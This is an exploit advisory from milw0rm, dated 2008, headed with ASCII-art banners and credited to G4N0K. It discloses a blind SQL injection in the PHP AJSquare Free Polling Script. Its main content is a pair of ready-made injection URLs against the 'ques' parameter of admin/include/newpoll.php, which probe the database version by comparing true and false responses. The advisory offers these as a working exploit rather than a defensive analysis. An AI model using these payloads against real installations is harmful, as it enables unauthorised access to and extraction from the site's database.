============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== AJSquare Free Polling Script (DB) Multiple Vulnerabilities ============================================================================== [»] Script: [ AJSquare Free Polling Script DataBase Version ] [»] Language: [ PHP ] [»] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] [»] Type: [ Free ] [»] Report-Date: [ 10.11.2008 ] [»] Founder: [ G4N0K ] ===[ XPL ]=== [1][!] Blind SQLi (MQ = off) [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True [»] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False [../admin/include/newpoll.php] [»] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); =============================================================================== # milw0rm.com [2008-11-10]